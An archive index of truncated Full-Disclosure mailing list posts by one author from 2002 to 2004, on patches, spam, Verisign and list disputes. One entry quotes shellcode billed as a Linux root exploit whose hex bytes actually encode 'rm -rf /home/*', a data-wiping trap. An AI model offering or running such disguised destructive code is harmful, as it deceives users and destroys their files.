Re: [Full-Disclosure] And how long have buffer overflows been around?

2004-02-27 Thread Nexus
- Original Message - From: "Schmehl, Paul L" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Friday, February 27, 2004 6:05 PM Subject: RE: [Full-Disclosure] And how long have buffer overflows been around? [snip] > > Does anyone know if the concept of "Windows tim

Re: [Full-Disclosure] HELLO

2004-02-12 Thread Nexus
- Original Message - From: "CHS" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Thursday, February 12, 2004 8:28 AM Subject: Re: [Full-Disclosure] HELLO > > wow, has ALL of cisco been 0wned? > > am I the only one who sees just how absolutely fscking hilarious th

RE: [Full-Disclosure] Bush Bashing (use to be Has Verisign time arrived ?)

2003-10-05 Thread Nexus
- Original Message - From: "Exibar" <[EMAIL PROTECTED]> [snip] > I agree 100%! I could care less what those who live in other countries > say, because they know deep down, that if they were the victims of a 9/11 > type attack, they would be asking the good old USA for help. And we WO

Re: [Full-Disclosure] More on Dan Geer

2003-09-30 Thread Nexus
- Original Message - From: "madsaxon" <[EMAIL PROTECTED]> [snip] > Agreed. Has anyone asked Dan for his take, I wonder? >From http://www.eweek.com/article2/0,4149,1304909,00.asp "The Venn diagram of facts doesn't intersect. The intersection of all of those statements is the null set,"

Re: [Full-Disclosure] Verisign abusing .COM/.NET monopoly, BIND releases new

2003-09-17 Thread Nexus
- Original Message - From: "Michael Scheidell" <[EMAIL PROTECTED]> [snip] > One more interesting thing, if you have a client who has given you ip > addresses for external testing, and these ip addresses rdns to a domain > that doens't FWD resolve, you wil end up pen testing verisign's co

Re: [Full-Disclosure] Verisign abusing .COM/.NET monopoly, BIND releases new

2003-09-17 Thread Nexus
- Original Message - From: "Rainer Gerhards" <[EMAIL PROTECTED]> [snip] > I don't like what Verisign does. But localhost.localdomain.com is not a > safe domain name. I'd recommend either to use one registered to your > organization or use one of those from > http://www.faqs.org/rfcs/rfc

[Full-Disclosure] New game anyone ?

2003-07-29 Thread Nexus
Instead of "spot the fed", how about "spot the plugger" ? http://www.internalmemos.com/memos/memodetails.php?memo_id=1739 ;-) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] SPAM with a PGP signature?

2003-07-21 Thread Nexus
- Original Message - From: "Pamela Patterson" <[EMAIL PROTECTED]> [snip] > Spamassasin deducts a couple of points from the Spam Score of a message > if it's PGP signed. It wouln't surprise me if other spam filters do as > well. Which doesn't go far when (for example, SA) still gives a s

Re: [Full-Disclosure] Announcement: New Security Vulnerability List

2003-07-15 Thread Nexus
- Original Message - From: <[EMAIL PROTECTED]> [snip] > Sounds like a fine idea, but there is another one like it, I've been > on it for a month now: > http://secunia.com/secunia_security_advisories/ > > I find it better, no html crap, well it doesn't seem to be 24/7, but > they do cut

Re: Re: [Full-Disclosure] The incredible intolerance of Knud

2003-07-11 Thread Nexus
- Original Message - From: "Andreia Gaita" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Friday, July 11, 2003 7:25 PM Subject: OT: Re: [Full-Disclosure] The incredible intolerance of Knud [snip] > Just my 2 (off-topic) cents. To throw in another 0.0456 euros's, as of IE6 SP

Re: [Full-Disclosure] A worm...

2003-06-26 Thread Nexus
- Original Message - From: "Peter Kruse" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Thursday, June 26, 2003 1:57 PM Subject: SV: [Full-Disclosure] A worm... [snip] > malicious code inside the new rar format and spread it. I suppose it´s > fairly easy to write a worm that packs it

Re: [Full-Disclosure] Administrivia: Poll

2003-06-12 Thread Nexus
- Original Message - From: "northern snowfall" <[EMAIL PROTECTED]> > Can you add an 'I know enough to skip over most of his emails' > option. Sometimes, I find people fail to remember that they have > a choice to click on that new email they've received. Isn't this > what people have bee

Re: [Full-Disclosure] In regards to recent crap flooding list.

2003-06-02 Thread Nexus
- Original Message - From: "John Andersen" <[EMAIL PROTECTED]> > I can't believe any rational person would click a link in THIS mailing list > without at first a casual inspection. Believe it mate - personally I think we need more of it as a Darwinian winnowing exercise ;-) Still, even

Re: [Full-Disclosure] FW: BUSINESS PROPOSITION

2003-05-14 Thread Nexus
- Original Message - From: "Shawn McMahon" <[EMAIL PROTECTED]> This is why they're called 419 scams, instead of Nigerian scams, in law enforcement circles. [snip] Which is why they are are called 419 scams as that's the Nigerian penal code for advance fee fraud. Might I suggest your LE

Re: [Full-Disclosure] Fwd: this address is no longer available

2003-05-14 Thread Nexus
And yet another MTA kicks in courtsesy of [EMAIL PROTECTED] - eight from this list and a bounce from the whois info from DENIC :( *sigh* It's going to be one of those weeks... I need some beer ;-) Cheers. - Original Message - From: <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Wedne

Re: [Full-Disclosure] Unusual request

2003-02-12 Thread Nexus
- Original Message - From: "yossarian" <[EMAIL PROTECTED]> To: "Sung J. Choe" <[EMAIL PROTECTED]>; "'Paul Schmehl'" <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Thursday, February 13, 2003 12:01 AM Subject: Re: [Full-Disclosure] Unusual request RE: [Full-Disclosure] Unusual requestI

Re: [Full-Disclosure] Drive-by download from a spam email message

2003-01-21 Thread Nexus
- Original Message - From: "Richard M. Smith" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>; "'Richard M. Smith'" <[EMAIL PROTECTED]> Sent: Tuesday, January 21, 2003 3:05 AM Subject: [Full-Disclosure] Drive-by download from a spam email message > Hi, > > I just tried to opt-out from a spam

Re: [Full-Disclosure] Proof of concept code to kill script kiddies out of the water!

2002-11-29 Thread Nexus
>Get r00t on any Linux x86 system >With the below shellcode. > >It uses an exploit in the linux >kernel to elevate privilages to root! > > */ > char shellcode[] = > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" > "\x72\x

Re: [Full-Disclosure] 60 yada yada *yawn*

2002-10-11 Thread Nexus
Set Killfiles to u. Kill, Mr Sulu ;-) (Especially when the signature seems to fail) Cheers. - Original Message - From: "David Vincent" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Thursday, October 10, 2002 9:41 PM Subject: RE: [Full-Disclosure] 60 Poot ze-a cheekee in de

Re: [Full-Disclosure] Outlook Express Remote Code Execution in Preview Pane (S/MIME)

2002-10-10 Thread Nexus
- Original Message - From: "HggdH" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Friday, October 11, 2002 12:41 AM Subject: Fw: [Full-Disclosure] Outlook Express Remote Code Execution in Preview Pane (S/MIME) > I went ahead, and downloaded and applied the patch to one of my systems.

Re: [Full-Disclosure] I like to make charters

2002-10-09 Thread Nexus
It's even easier to ignore now, even if you don't know how to read SMTP headers ;-) From: [EMAIL PROTECTED] Mime-Version: 1.0 Content-type: multipart/mixed; boundary=separator Message-Id: <[EMAIL PROTECTED]> X-AntiAbuse: This header was added to track abuse, please include it with any abuse repor

[Full-Disclosure] Re Windows Update

2002-09-26 Thread Nexus
> It is quite lame to make this only available via Windows Update. A lot of As a few people pointed out to me, the corporate version of windows update is no longer working. Mea Culpa. However, there is another way ;-) http://www.ntbugtraq.com/redisWU.asp OK so it's a bit painful but it does mea

Re: [Full-Disclosure] Bugtraq postings from non-members may disclose some list-member's addresses

2002-09-26 Thread Nexus
an be enumerated, as can personnel absence Author : Nexus <[EMAIL PROTECTED]> Vend Status: Out of Jolt bummer said Dougal CVE: It's too common for a CVE Reference... well actually, I haven't asked them Overview The names, contact details and presence at work of Administrators and Secur

[Full-Disclosure] Interesting email trick

2002-09-22 Thread Nexus
ialler scam. Cheers. Received: from mmx (abn195-23.izmir-ports.kablonet.net.tr [195.174.195.23]) by i-way.co.uk (8.9.3/8.9.3) with SMTP id RAA16671 for <[EMAIL PROTECTED]>; Sun, 22 Sep 2002 17:00:13 +0100 Message-Id: <[EMAIL PROTECTED]> From: "coderip" <[EMAIL PROTECTED]>

[Full-Disclosure] MS Updates, Was : MS-02-052

2002-09-21 Thread Nexus
- Original Message - From: "Moyer, Shawn" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Saturday, September 21, 2002 1:16 AM Subject: RE: [Full-Disclosure] Re: MS-02-052 [snip] > It is quite lame to make this only available via Windows Update. A lot of > people are deploying their own

Re: [Full-Disclosure] Re: MS-02-052

2002-09-20 Thread Nexus
- Original Message - From: "Steve" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Friday, September 20, 2002 5:59 PM Subject: Re: [Full-Disclosure] Re: MS-02-052 > Hehe, right you are. > > But we've got more valuable things to do with our time than chasing > patches that will never f

Re: [Full-Disclosure] Re: MS-02-052

2002-09-20 Thread Nexus
- Original Message - From: "Steve" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Friday, September 20, 2002 4:19 PM Subject: Re: [Full-Disclosure] Re: MS-02-052 [snip] > else. I've banned windows in our server room. Removed IE, Outlook, > Media Player etc. I'm

Re: [Full-Disclosure] openssl exploit code (e-secure-it owned)

2002-09-19 Thread Nexus
> > However, you could acknowledge that we were not the > > only one at the same time. Untold security companies > > and sites were defaced by PoizonB0x and others > > in that very same period. Including: SecurityNewsportal, CNet, > > Attrition, Lucent. Microsoft (18 times in total?), SANS, > >

Re: Re[2]: [Full-Disclosure] Off Topic

2002-09-12 Thread Nexus
> > [EMAIL PROTECTED] is _not_ [EMAIL PROTECTED] and is not GOBBLES. > > More than one GOBBLES there is. > More than one X-Originating-Ip: 62.153.252.11 there also is, ? ;-) Es tut mir lied, na ? ___ Full-Disclosure - We believe in it. Charte